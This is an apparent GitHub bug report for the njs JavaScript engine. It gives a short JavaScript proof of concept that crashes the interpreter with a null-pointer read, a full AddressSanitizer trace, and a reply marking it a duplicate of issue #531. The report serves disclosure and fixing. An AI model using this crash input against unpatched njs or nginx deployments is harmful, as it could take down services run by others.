SEGV in njs_vmcode_function_copy /njs_asan/src/njs_vmcode.c:1270:10
Hi there, the following PoC triggers a crash in the latest commit:
PoC:

```javascript
async function a(f) {
    try {
        await f
        b
    } catch (c) {
        function g() {
            g = {}
        }
        (function(d) { d() }(g))
        function e() { g }
    }
}
a()
```
Environment:
Commit: b403e2e83eb417e43c01707691b2092393d1911d
System: Ubuntu 18.04.6 LTS
ASan dump:
```
/njs_asan/build/njs ./poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3200752==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004e876d bp 0x7fffffffc350 sp 0x7fffffffbfe0 T0)
==3200752==The signal is caused by a READ memory access.
==3200752==Hint: address points to the zero page.
    #0 0x4e876d in njs_vmcode_function_copy /njs_asan/src/njs_vmcode.c:1270:10
    #1 0x4e1aa2 in njs_vmcode_interpreter /njs_asan/src/njs_vmcode.c:741:23
    #2 0x52dcdf in njs_function_lambda_call /njs_asan/src/njs_function.c:693:11
    #3 0x52d6d0 in njs_function_frame_invoke /njs_asan/src/njs_function.c:780:16
    #4 0x4e39ec in njs_vmcode_interpreter /njs_asan/src/njs_vmcode.c:799:23
    #5 0x52dcdf in njs_function_lambda_call /njs_asan/src/njs_function.c:693:11
    #6 0x52d6d0 in njs_function_frame_invoke /njs_asan/src/njs_function.c:780:16
    #7 0x4e39ec in njs_vmcode_interpreter /njs_asan/src/njs_vmcode.c:799:23
    #8 0x5ccdfc in njs_await_fulfilled /njs_asan/src/njs_async.c:91:11
    #9 0x52e775 in njs_function_native_call /njs_asan/src/njs_function.c:739:11
    #10 0x52d6c4 in njs_function_frame_invoke /njs_asan/src/njs_function.c:777:16
    #11 0x52d588 in njs_function_call2 /njs_asan/src/njs_function.c:592:11
    #12 0x5bf006 in njs_function_call /njs_asan/src/njs_function.h:177:12
    #13 0x5bf006 in njs_promise_reaction_job /njs_asan/src/njs_promise.c:1171:15
    #14 0x52e775 in njs_function_native_call /njs_asan/src/njs_function.c:739:11
    #15 0x52d6c4 in njs_function_frame_invoke /njs_asan/src/njs_function.c:777:16
    #16 0x4dd0f4 in njs_vm_invoke /njs_asan/src/njs_vm.c:426:12
    #17 0x4dbeb8 in njs_vm_call /njs_asan/src/njs_vm.c:410:12
    #18 0x4dd832 in njs_vm_handle_events /njs_asan/src/njs_vm.c:570:19
    #19 0x4dd615 in njs_vm_run /njs_asan/src/njs_vm.c:530:12
    #20 0x4cb48f in njs_process_script /njs_asan/src/njs_shell.c:924:15
    #21 0x4cbb68 in njs_process_file /njs_asan/src/njs_shell.c:619:11
    #22 0x4ca1fc in main /njs_asan/src/njs_shell.c:303:15
    #23 0x7ffff676dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    #24 0x41d9a9 in _start (/njs_asan/build/njs+0x41d9a9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /njs_asan/src/njs_vmcode.c:1270:10 in njs_vmcode_function_copy
==3200752==ABORTING
```
Dup of https://github.com/nginx/njs/issues/531?
Yes, duplicate of #531.